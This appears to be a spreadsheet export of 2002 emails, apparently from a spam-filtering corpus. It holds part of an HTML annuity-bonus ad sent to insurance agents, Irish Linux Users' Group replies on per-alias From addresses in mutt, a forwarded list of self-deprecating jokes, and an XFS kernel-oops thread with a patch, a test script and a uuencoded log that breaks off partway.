        &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#990000"&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/annuity0814/20020814-101.gif" =
 alt=3D"Get a kick out of our huge annuity bonuses!" width=3D"550" =
 height=3D"113"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"272" height=3D"312" valign=3D"top"&gt;
             &lt;img =
 src=3D"http://iiq.us/images/mando/annuity0814/20020814-201.gif" =
 width=3D"265" height=3D"181" alt=3D"Earn a $1,000 cash bonus*&amp;#10;for =
 every 5 annuity applications&amp;#10;with any of our four top =
 carriers&amp;#10;by 9-30-02!&amp;#10;Deadline too soon? No Problem!&amp;#10;Earn an =
 $800 cash bonus*&amp;#10;for every 5 annuity applications&amp;#10;with any of =
 our four top carriers&amp;#10;by 12-31-02!"&gt;&lt;br&gt;
 	          &lt;img =
 src=3D"http://iiq.us/images/mando/annuity0814/20020814-202.gif" =
 width=3D"265" height=3D"133"&gt;
 	        &lt;/td&gt;
           &lt;td width=3D"288"&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/annuity0814/20020814-102.jpg" =
 width=3D"288" height=3D"311"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;
             &lt;font color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Get your bonus! Call =
 M&amp;amp;O Marketing today!&lt;br&gt;
             &lt;img =
 src=3D"http://iiq.us/images/mando/annuity0814/20020814-4.gif" =
 alt=3D"800-862-0959" width=3D"540" height=3D"76"&gt;=20
             &lt;br&gt;
             &amp;#8212; or &amp;#8212;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;=20
             &lt;table width=3D"95%" border=3D"1" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#660000"&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Please fill =
 out the form below for more information&lt;/b&gt;&lt;/font&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q_gray.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"marketing@mandomarketing.com"&gt;=20
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"M&amp;O Annuity Ad Inquiry"&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;p align=3D"left"&gt;&lt;font size=3D"1" =
 color=3D"#ffffff"&gt;*Bonuses awarded from=20
               M&amp;amp;O Marketing on paid, issued business. For agent use =
 only.=20
               Offer subject to change without notice. Offer starts =
 7/15/02. Offer=20
               ends 12/31/02. Offer good in all states except: WI, IN, =
 DE. Not=20
               available with all carriers.&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 		&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;
 			&lt;p&gt;&lt;font size=3D"1"&gt;We don't want anyone to receive our mailings who =
 does not=20
 			wish to receive them. This is a professional communication=20
 			sent to insurance professionals. To be removed from this mailing=20
 			list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;=20
 			http://www.insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1"&gt;Legal =
 Notice &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;&lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_3A5886_01C24C5D.B368E220--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 11:28:11AM +0200, David Neary mentioned:
 &gt; For example, say I have a company, and sales@company.com,
 &gt; info@company.com and tech@company.com arrive in the same mailbox.
 &gt; I don't want to reply to sales@company.com mails with the From:
 &gt; set to dave@company.com, I would like the mail to come from
 &gt; sales@company.com.
  Best thing to do would be to have each of those addresses going to a
 different folder, then set your "from" address based on the folder you are
 in, when replying.
 john
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 havn't tried this, but looks like what you want.  I use procmail to filter
 different incomgin To/CCs to different folders then use folder hok, but
 this looks closer to what you want.
 http://www.linuxcare.com/viewpoints/ap-of-the-wk/03-31-00.epl
 **************************************************************************
 Some of the mailto links on our web site forward to me. When I reply to
 someone who writes to one of these aliases, I prefer to keep the mail alias
 as the From: address in my reply. For example, when someone sends email to
 coolapps@linuxcare.com to suggest a program for me to review [pardon the
 blatant plug...], it forwards to me. When I hit reply, the From: line in
 the email will contain coolapps@linuxcare.com instead of my main address
 bneely@linuxcare.com. My .muttrc file accomplishes this with two lines:
 set alternates = "kbeditor@linuxcare.com|coolapps@linuxcare.com"
 set reverse_name
 **************************************************************************
 On Tue, 30 Jul 2002, David Neary wrote:
 &gt; I have 3 or 4 email addresses (which get used for different
 &gt; reasons), and I'd prefer not to mix them up. So I was wondering
 &gt; if anyone knows of a way that I can have mail (apart from list
 &gt; mail, which I have already sorted) which arrives to a certain
 &gt; e-mail address have the From: header in the reply automatically
 &gt; set to the address it came to.
 &gt; 
 &gt; For example, say I have a company, and sales@company.com,
 &gt; info@company.com and tech@company.com arrive in the same mailbox.
 &gt; I don't want to reply to sales@company.com mails with the From:
 &gt; set to dave@company.com, I would like the mail to come from
 &gt; sales@company.com.
 &gt; 
 &gt; Is there any way to do this? Bearing in mind that mail can arrive
 &gt; with my email in the To or Cc fields (and Bcc?), and it might be
 &gt; buried in a couple of dozen other recipients...
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I was such an ugly baby...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Chris Wedgwood &lt;cw@f00f.org&gt;
 From: Bert
 01. I was so poor growing up...  if I wasn't a boy...  I'd have had
     nothing to play with.
 02. A girl phoned me the other day and said, "Come on over; nobody's
     home."  I went over. Nobody was home.
 03. During sex, my girlfriend always wants to talk to me.  Just the
     other night she called me from a hotel
 04. One day I came home early from work...  I saw a guy jogging
     naked. I said to the guy, "Hey buddy, why are you doing that?"  He
     said "Because you came home early."
 05. It's been a rough day. I got up this morning...  put a shirt on
     and button fell off.  I picked up my briefcase, and the handle
     came off.  I'm afraid to go to the bathroom.
 06. I was such an ugly kid...  When I played in the sandbox, the cat
     kept covering me up.
 07. I could tell my parents hated me.  My bath toys were a toaster and
     radio.
 08. I was such an ugly baby...  My mother never breast fed me. She
     told me that she only liked me as a friend.
 09. I'm so ugly...  My father carries around a picture of the kid who
     came with his wallet.
 10. When I was born, the doctor came into the waiting room and said to
     my father, "I'm sorry. We did everything we could, but he pulled
     through."
 11. I'm so ugly...  My mother had morning sickness...  AFTER I was
     born.
 12. I remember the time that I was kidnapped and they sent a piece of
     my finger to my father.  He said he wanted more proof.
 13. Once when I was lost, I saw a policeman, and asked him to help me
     find my parents. I said to him, "Do you think we'll ever find
     them?" He said,"I don't know kid. There's so many places they can
     hide."
 14. My wife made me join a bridge club. I jump off next Tuesday.
 15. I'm so ugly...  I worked in a pet shop, and people kept asking how
     big I'd get.
 16. I went to see my doctor. "Doctor, every morning when I get up and
     I look in the mirror...  I feel like throwing up; What's wrong
     with me?" He said...  "I don't know but your eyesight is perfect."
 17. I went to the doctor because I'd swallowed a bottle of sleeping
     pills. My doctor told me to have a few drinks and get some rest.
 18. With my old man I got no respect. I asked him, "How can I get my
     kite in the air?" He told me to run off a cliff.
 19. Some dog I got. We call him Egypt because in every room he leaves
     a pyramid. His favorite bone is in my arm.  Last night he went on
     the paper four times - three of those times I was reading it.
 20. One year they wanted to make me poster boy - for birth control.
 21. My uncle's dying wish was to have me sitting in his lap; he was in
     the electric chair.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: kernel BUG at filemap.c:843!
</t>
  </si>
  <si>
    <t xml:space="preserve">I did more testing with your patch on top of today's CVS, but the patch
 didn't help at all.
 The following is the results of the tests:
 Testing setup:
 1. created a "/dev/md0" with 4 scsi disks
 2. created a LVM Volume group "vg" with the "/dev/md0"
 3. created a LVM logical volume "vol1" with "vg"
 4. created a XFS fs with a command:
     mkfs.xfs -f -d sunit=8,swidth=8 /dev/vg/vol1
     -----------meta-data=/dev/vg/vol1           isize=256    agcount=8,
 agsize=32767 blks
     -----------data     =                       bsize=4096   blocks=262136,
 imaxpct=25
     -----------         =                       sunit=1      swidth=1 blks,
 unwritten=0
     -----------naming   =version 2              bsize=4096
     -----------log      =internal log           bsize=4096   blocks=1200,
 version=1
     -----------         =                       sunit=1 blks
     -----------realtime =none                   extsz=65536  blocks=0,
 rtextents=0
 Test results:
 1. mount with quota enabled =&gt; occasional kernel oops, attached the file
 oops1
 2. mount without quota enabled =&gt; occasional kernel oops, attached the file
 oops2
 3. mount without quota enabled, while md device is in degraded mode =&gt;
 always kernel oops, attached the file oops3
 Thanks,
 JLee
 ----- Original Message -----
 From: "Eric Sandeen" &lt;sandeen@sgi.com&gt;
 To: "James Lee" &lt;jlee@canada.com&gt;
 Cc: &lt;linux-xfs@oss.sgi.com&gt;; &lt;ilmari@ping.uio.no&gt;
 Sent: Tuesday, August 13, 2002 3:03 PM
 Subject: Re: kernel BUG at filemap.c:843!
 &gt; Hi guys -
 &gt;
 &gt; We treat MD and LVM somewhat specially, and I wonder if in this case MD
 &gt; is masking the fact that you're using LVM, and that might be where the
 &gt; problem starts.
 &gt;
 &gt; Can you try this patch, which will cause LVM &amp; MD to be treated the
 &gt; same, to see if it helps?  It's probably not the final solution, but it
 &gt; might offer some hints.
 &gt;
 &gt; Thanks,
 &gt;
 &gt; -Eric
 &gt;
 &gt; --- linux/fs/xfs/pagebuf/page_buf_locking.c_1.24 Tue Aug 13 14:05:18 2002
 &gt; +++ linux/fs/xfs/pagebuf/page_buf_locking.c Tue Aug 13 13:59:37 2002
 &gt; @@ -198,7 +196,7 @@
 &gt;   pagebuf_target_blocksize(target, PAGE_CACHE_SIZE);
 &gt;
 &gt;   if ((MAJOR(dev) == MD_MAJOR) || (MAJOR(dev) == EVMS_MAJOR))
 &gt; - target-&gt;pbr_flags = PBR_ALIGNED_ONLY;
 &gt; + target-&gt;pbr_flags = PBR_SECTOR_ONLY;
 &gt;   else if (MAJOR(dev) == LVM_BLK_MAJOR)
 &gt;   target-&gt;pbr_flags = PBR_SECTOR_ONLY;
 &gt;   else
 &gt;
 &gt;
 &gt;
 &gt; On Mon, 2002-08-12 at 01:40, James Lee wrote:
 &gt; &gt; Hi,
 &gt; &gt;
 &gt; &gt; I'm also having the exactly same problem.
 &gt; &gt; Tested with 2.4.19-xfs(checked out from SGI's CVS on Aug 10) on Redhat
 7.2.
 &gt; &gt; Kernel and userland tools are compiled with gcc 2.91.66
 &gt; &gt; The following is the result of some tests:
 &gt; &gt;
 &gt; &gt; scsidisks -&gt; xfs: OK
 &gt; &gt; scsidisks -&gt; raid5 -&gt; xfs: OK
 &gt; &gt; scsidisks -&gt; lvm -&gt; xfs: OK
 &gt; &gt; scsidisks -&gt; raid0 -&gt; lvm -&gt; xfs: OK
 &gt; &gt; scsidisks -&gt; raid1 -&gt; lvm -&gt; xfs: OK
 &gt; &gt; scsidisks -&gt; raid5 -&gt; lvm -&gt; xfs: kernel BUG at filemap.c:843!
 &gt; &gt;
 &gt; &gt; This problem is always reproducible with the following shell script:
 &gt; &gt;
 &gt; &gt;         #!/bin/sh
 &gt; &gt;         mkraid /dev/md0
 &gt; &gt;         vgcreate VolumeGroup /dev/md0
 &gt; &gt;         lvcreate -L1G -nTestVolume VolumeGroup
 &gt; &gt;         mkfs.xfs -f -d size=32m /dev/VolumeGroup/TestVolume
 &gt; &gt;         mount -t xfs /dev/VolumeGroup/TestVolume
 &gt; &gt; /mnt -onoatime,nodiratime,usrquota,grpquota
 &gt; &gt;
 &gt; &gt; Whenever I run the above script, mount command always generates kernel
 oops.
 &gt; &gt; But, if I insert some delay as of the following, then mount goes well:
 &gt;
 &gt;
 &gt; --
 &gt; Eric Sandeen      XFS for Linux     http://oss.sgi.com/projects/xfs
 &gt; sandeen@sgi.com   SGI, Inc.         651-683-3102
 begin 666 oops1.dat
 M=&amp;5S=&amp;5D.B R+C0N,3DM&gt;&amp;9S("A31TDG&lt;R!#5E,@;VX@075G(#$W*0I.3U1%
 M.B!-;W5N=&amp;EN9R!X9G,@9FEL92!S&gt;7-T96T@8W)E871E9"!O;B!T;W @;V8@
 M3%9-("L@340L('-O;65T:6UE&lt;R!G96YE&lt;F%T97,@:V5R;F5L(&amp;]O&lt;',*"CT]
 M/3T]/3T]/3T]/3T]/3T](&amp;-O;6UA;F1S(&amp;5X8W5T960@/3T]/3T]/3T]/3T]
 M/3T]/3T]"@IL=F-R96%T92 M3#%'("UN=F]L,2!V9PIM:V9S+GAF&lt;R M9B M
 M9"!S=6YI=#TX+'-W:61T:#TX("]D978O=F&lt;O=F]L,0IM;W5N=" O9&amp;5V+W9G
 M+W9O;#$@+VUN="]V;VPQ("UO;F]A=&amp;EM92QN;V1I&lt;F%T:6UE"@H]/3T]/3T]
 M/3T]/3T]/3T]/2!C870@+W!R;V,O;61S=&amp;%T(#T]/3T]/3T]/3T]/3T]/3T]
 M/0H*4&amp;5R&lt;V]N86QI=&amp;EE&lt;R Z(%MR86ED,%T@6W)A:60Q72!;&lt;F%I9#5=( IR
 M96%D7V%H96%D(#$P,C0@&lt;V5C=&amp;]R&lt;PIM9# @.B!A8W1I=F4@&lt;F%I9#4@&lt;V1D
 M6S-=('-D8ULR72!S9&amp;);,5T@&lt;V1A6S!="B @(" @(#(Y,S U-S X."!B;&amp;]C
 M:W,@;&amp;5V96P@-2P@-C1K(&amp;-H=6YK+"!A;&amp;=O&lt;FET:&amp;T@,"!;-"\T72!;5555
 M55T*(" @(" @"G5N=7-E9"!D979I8V5S.B \;F]N93X*"CT]/3T]/3T]/3T]
 M/3T]/3T]/3T]/3T@:W-Y;6]O&lt;',@/3T]/3T]/3T]/3T]/3T]/3T]/3T]"FMS
 M&gt;6UO;W!S(#(N-"XQ(&amp;]N(&amp;DV.#8@,BXT+C$Y+B @3W!T:6]N&lt;R!U&lt;V5D"B @
 M(" @+58@*&amp;1E9F%U;'0I"B @(" @+6L@+W!R;V,O:W-Y;7,@*&amp;1E9F%U;'0I
 M"B @(" @+6P@+W!R;V,O;6]D=6QE&lt;R H9&amp;5F875L="D*(" @(" M;R O;&amp;EB
 M+VUO9'5L97,O,BXT+C$Y+R H9&amp;5F875L="D*(" @(" M;2 O8F]O="]3&gt;7-T
 M96TN;6%P+3(N-"XQ.2 H9&amp;5F875L="D*"E=A&lt;FYI;F&lt;Z(%EO=2!D:60@;F]T
 M('1E;&amp;P@;64@=VAE&lt;F4@=&amp;\@9FEN9"!S&gt;6UB;VP@:6YF;W)M871I;VXN("!)
 M('=I;&amp;P*87-S=6UE('1H870@=&amp;AE(&amp;QO9R!M871C:&amp;5S('1H92!K97)N96P@
 M86YD(&amp;UO9'5L97,@=&amp;AA="!A&lt;F4@&lt;G5N;FEN9PIR:6=H="!N;W&lt;@86YD($DG
 M;&amp;P@=7-E('1H92!D969A=6QT(&amp;]P=&amp;EO;G,@86)O=F4@9F]R('-Y;6)O;"!R
 M97-O;'5T:6]N+@I)9B!T:&amp;4@8W5R&lt;F5N="!K97)N96P@86YD+V]R(&amp;UO9'5L
 M97,@9&amp;\@;F]T(&amp;UA=&amp;-H('1H92!L;V&lt;L('EO=2!C86X@9V5T"FUO&lt;F4@86-C
 M=7)A=&amp;4@;W5T&lt;'5T(&amp;)Y('1E;&amp;QI;F&lt;@;64@=&amp;AE(&amp;ME&lt;FYE;"!V97)S:6]N
 M(&amp;%N9"!W:&amp;5R92!T;R!F:6YD"FUA&lt;"P@;6]D=6QE&lt;RP@:W-Y;7,@971C+B @
 M:W-Y;6]O&lt;',@+6@@97AP;&amp;%I;G,@=&amp;AE(&amp;]P=&amp;EO;G,N"@IK97)N96P@0E5'
 M(&amp;%T(&amp;9I;&amp;5M87 N8SHX-#,A"FEN=F%L:60@;W!E&lt;F%N9#H@,# P, I#4%4Z
 M(" @(#$*14E0.B @(" P,#$P.EL\8S Q,F)D9#8^72 @("!.;W0@=&amp;%I;G1E
 M9 I5&lt;VEN9R!D969A=6QT&lt;R!F&lt;F]M(&amp;MS&gt;6UO;W!S("UT(&amp;5L9C,R+6DS.#8@
 M+6$@:3,X-@I%1DQ!1U,Z(# P,#$P,C0V"F5A&gt;#H@8S$Y969B-# @("!E8G@Z
 M(&amp;,P,V$W9#$T(" @96-X.B P,# P,# Q-B @(&amp;5D&gt;#H@,# P,# P,# *97-I
 M.B!C,6,P,&amp;5C8R @(&amp;5D:3H@9C5F,F9F,C @("!E8G Z(# P,# P,# Q(" @
 M97-P.B!F-6-D,3DY. ID&lt;SH@,# Q." @(&amp;5S.B P,#$X(" @&lt;W,Z(# P,3@*
 M4')O8V5S&lt;R!M;W5N=" H&lt;&amp;ED.B Q-30T-"P@&lt;W1A8VMP86=E/68U8V0Q,# P
 M*0I3=&amp;%C:SH@,# P,# P,#$@9C5E9F5F-C @8S R-#5E-S8@8S$Y969B-# @
 M8S R-S$P.#0@9C&lt;X9C!C8S @8S R-S!F8S&lt;@,# P,# X,S *(" @(" @(&amp;8U
 M,&amp;8Y9C@P(# P,# P,# P(# P,# P,# P(&amp;8V9#!C,# P(&amp;,P,C0U96(Q(&amp;8U
 M,&amp;8Y9C@P(# P,# P,# Q(# P,# P,# Q"B @(" @("!C,#)D.3(S."!F-3!F
 M.68X," P,# P,# P,2 P,# P,# P,2 P,# P,# P,2!C,#(W,34P8R P,# P
 M,# W8R!F9F9F9F9F8PI#86QL(%1R86-E.B @("!;/&amp;,P,C0U93&lt;V/ET@6SQC
 M,#(W,3 X-#Y=(%L\8S R-S!F8S&lt;^72!;/&amp;,P,C0U96(Q/ET@6SQC,#)D.3(S
 M.#Y="B @6SQC,#(W,34P8SY=(%L\8S R9#DU-S,^72!;/&amp;,P,F1C83EE/ET@
 M6SQC,#)E,V(U9CY=(%L\8S R-S$Y96$^72!;/&amp;,P,C0U96$P/ET*("!;/&amp;,P
 M,C0V,F1A/ET@6SQC,#(T-C0W9#Y=(%L\8S R-#8Y,&amp;,^72!;/&amp;,P,C0V-3@Y
 M/ET@6SQC,#(T-&amp;8T9#Y=(%L\8S R-#1F830^70H@(%L\8S R-#5C,C8^72!;
 M/&amp;,P,C0U-3(R/ET@6SQC,#(T-#(S93Y=(%L\8S R,S,W.&amp;4^72!;/&amp;,P,C,T
 M,61D/ET@6SQC,#(S,S9B8CY="B @6SQC,#(S,S&lt;P,#Y=(%L\8S R,V)E9#0^
 M72!;/&amp;,P,C-C,#!B/ET@6SQC,#(T968R-CY=(%L\8S Q-#!D9&amp;,^72!;/&amp;,P
 M,30P9F5C/ET*("!;/&amp;,P,34R9F$V/ET@6SQC,#$Q-C8V,#Y=(%L\8S Q,#AD
 M,F,^72!;/&amp;,P,34S,C9B/ET@6SQC,#$U,S!B8SY=(%L\8S Q-3,V.30^70H@
 M(%L\8S Q,#AC,V(^70I#;V1E.B P9B P8B T8B P,R T.2!E82 S-"!C," X
 M9" T-B P-" S.2 T-B P-" W-" Q," U8B X.2!F," S,0H*/CY%25 [(&amp;,P
 M,3)B9&amp;0V(#QU;FQO8VM?&lt;&amp;%G92LT-B\W,#X@(" \/3T]/3T*5')A8V4[(&amp;,P
 M,C0U93&lt;V(#Q?96YD7W!A9V5B=69?&lt;&amp;%G95]I;U]M=6QT:2MF-B\Q,C ^"E1R
 M86-E.R!C,#(W,3 X-" \86-C;W5N=%]I;U]S=&amp;%R="LT-"\U,#X*5')A8V4[
 M(&amp;,P,C&lt;P9F,W(#QL;V-A=&amp;5?:&amp;1?&lt;W1R=6-T*S(W+S&lt;P/@I4&lt;F%C93L@8S R
 M-#5E8C$@/%]E;F1?:6]?;75L=&amp;E?9G5L;"LQ,2\R,#X*5')A8V4[(&amp;,P,F0Y
 M,C,X(#QH86YD;&amp;5?&lt;W1R:7!E*V1E."]F-3 ^"E1R86-E.R!C,#(W,34P8R \
 M7U]M86ME7W)E&lt;75E&lt;W0K,C)C+S8P,#X*5')A8V4[(&amp;,P,F0Y-3&lt;S(#QR86ED
 M-5]M86ME7W)E&lt;75E&lt;W0K,3 S+S$S,#X*5')A8V4[(&amp;,P,F1C83EE(#QM9%]M
 M86ME7W)E&lt;75E&lt;W0K,V4O-S ^"E1R86-E.R!C,#)E,V(U9B \;'9M7VUA:V5?
 M&lt;F5Q=65S=%]F;BMF+S(P/@I4&lt;F%C93L@8S R-S$Y96$@/&amp;=E;F5R:6-?;6%K
 M95]R97%U97-T*S$P82\Q,C ^"E1R86-E.R!C,#(T-65A," \7V5N9%]I;U]M
 M=6QT:5]F=6QL*S O,C ^"E1R86-E.R!C,#(T-C)D82 \7W!A9V5B=69?&lt;&amp;%G
 M95]I;RLS9F$O-#&lt;P/@I4&lt;F%C93L@8S R-#8T-V0@/%]P86=E7V)U9E]P86=E
 M7V%P&lt;&amp;QY*S$R9"\Q-# ^"E1R86-E.R!C,#(T-CDP8R \7W!A9V5B=69?&lt;V5G
 M;65N=%]A&lt;'!L&gt;2MA8R\Q,3 ^"E1R86-E.R!C,#(T-C4X.2 \&lt;&amp;%G96)U9E]I
 M;W)E&lt;75E&lt;W0K9CDO,34P/@I4&lt;F%C93L@8S R-#1F-&amp;0@/%]P86=E8G5F7VQO
 M;VMU&lt;%]P86=E&lt;RLQ-F0O,F8P/@I4&lt;F%C93L@8S R-#1F830@/%]P86=E8G5F
 M7VQO;VMU&lt;%]P86=E&lt;RLQ8S0O,F8P/@I4&lt;F%C93L@8S R-#5C,C8@/'!A9V5B
 M=69?:6]S=&amp;%R="LX-B]A,#X*5')A8V4[(&amp;,P,C0U-3(R(#QP86=E8G5F7V=E
 M="ME,B\Q,C ^"E1R86-E.R!C,#(T-#(S92 \&gt;&amp;9S7W)E861?8G5F*S-E+V8P
 M/@I4&lt;F%C93L@8S R,S,W.&amp;4@/'AF&lt;U]M;W5N=%]C;VUM;VXK-&amp;4O,V(P/@I4
 M&lt;F%C93L@8S R,S0Q9&amp;0@/'AF&lt;U]M;W5N=&amp;9S*S9E9"\Q,# P/@I4&lt;F%C93L@
 M8S R,S,V8F(@/'AF&lt;U]R96%D&lt;V(K,V(O8S ^"E1R86-E.R!C,#(S,S&lt;P," \
 M&gt;&amp;9S7W)E861S8BLX,"]C,#X*5')A8V4[(&amp;,P,C-B960T(#QX9G-?8VUO=6YT
 M9G,K-3&lt;T+S8Q,#X*5')A8V4[(&amp;,P,C-C,#!B(#QX9G-?;6]U;G0K-&amp;(O-C ^
 M"E1R86-E.R!C,#(T968R-B \;&amp;EN=F9S7W)E861?&lt;W5P97(K9C8O,C0P/@I4
 M&lt;F%C93L@8S Q-#!D9&amp;,@/&amp;=E=%]S8E]B9&amp;5V*S(R8R\R8C ^"E1R86-E.R!C
 M,#$T,&amp;9E8R \9&amp;]?:V5R;E]M;W5N="LU8R\Q,3 ^"E1R86-E.R!C,#$U,F9A
 M-B \9&amp;]?861D7VUO=6YT*S&lt;V+S$T,#X*5')A8V4[(&amp;,P,3$V-C8P(#QD;U]P
 M86=E7V9A=6QT*S O-&amp;9B/@I4&lt;F%C93L@8S Q,#AD,F,@/&amp;5R&lt;F]R7V-O9&amp;4K
 M,S0O,V,^"E1R86-E.R!C,#$U,S(V8B \9&amp;]?;6]U;G0K,35B+S$X,#X*5')A
 M8V4[(&amp;,P,34S,&amp;)C(#QC;W!Y7VUO=6YT7V]P=&amp;EO;G,K-&amp;,O83 ^"E1R86-E
 M.R!C,#$U,S8Y-" \&lt;WES7VUO=6YT*V$T+S$P,#X*5')A8V4[(&amp;,P,3 X8S-B
 M(#QS&gt;7-T96U?8V%L;"LS,R\S.#X*0V]D93L@(&amp;,P,3)B9&amp;0V(#QU;FQO8VM?
 M&lt;&amp;%G92LT-B\W,#X*,# P,# P,# @/%]%25 ^.@I#;V1E.R @8S Q,F)D9#8@
 M/'5N;&amp;]C:U]P86=E*S0V+S&lt;P/B @(#P]/3T]/0H@(" P.B @(#!F(#!B(" @
 M(" @(" @(" @(" @(" @(" @=60R82 @(" @(#P]/3T]/0I#;V1E.R @8S Q
 M,F)D9#@@/'5N;&amp;]C:U]P86=E*S0X+S&lt;P/@H@(" R.B @(#1B(" @(" @(" @
 M(" @(" @(" @(" @(" @9&amp;5C(" @("5E8G@*0V]D93L@(&amp;,P,3)B9&amp;0Y(#QU
 M;FQO8VM?&lt;&amp;%G92LT.2\W,#X*(" @,SH@(" P,R T.2!E82 @(" @(" @(" @
 M(" @(" @(&amp;%D9" @(" P&gt;&amp;9F9F9F9F5A*"5E8W@I+"5E8W@*0V]D93L@(&amp;,P
 M,3)B9&amp;1C(#QU;FQO8VM?&lt;&amp;%G92LT8R\W,#X*(" @-CH@(" S-"!C," @(" @
 M(" @(" @(" @(" @(" @('AO&lt;B @(" D,'AC,"PE86P*0V]D93L@(&amp;,P,3)B
 M9&amp;1E(#QU;FQO8VM?&lt;&amp;%G92LT92\W,#X*(" @.#H@(" X9" T-B P-" @(" @
 M(" @(" @(" @(" @(&amp;QE82 @(" P&gt;#0H)65S:2DL)65A&gt; I#;V1E.R @8S Q
 M,F)D93$@/'5N;&amp;]C:U]P86=E*S4Q+S&lt;P/@H@("!B.B @(#,Y(#0V(# T(" @
 M(" @(" @(" @(" @(" @8VUP(" @("5E87@L,'@T*"5E&lt;VDI"D-O9&amp;4[("!C
 M,#$R8F1E-" \=6YL;V-K7W!A9V4K-30O-S ^"B @(&amp;4Z(" @-S0@,3 @(" @
 M(" @(" @(" @(" @(" @("!J92 @(" @,C @/%]%25 K,'@R,#X@8S Q,F)D
 M9C8@/'5N;&amp;]C:U]P86=E*S8V+S&lt;P/@I#;V1E.R @8S Q,F)D938@/'5N;&amp;]C
 M:U]P86=E*S4V+S&lt;P/@H@(#$P.B @(#5B(" @(" @(" @(" @(" @(" @(" @
 M(" @&lt;&amp;]P(" @("5E8G@*0V]D93L@(&amp;,P,3)B9&amp;4W(#QU;FQO8VM?&lt;&amp;%G92LU
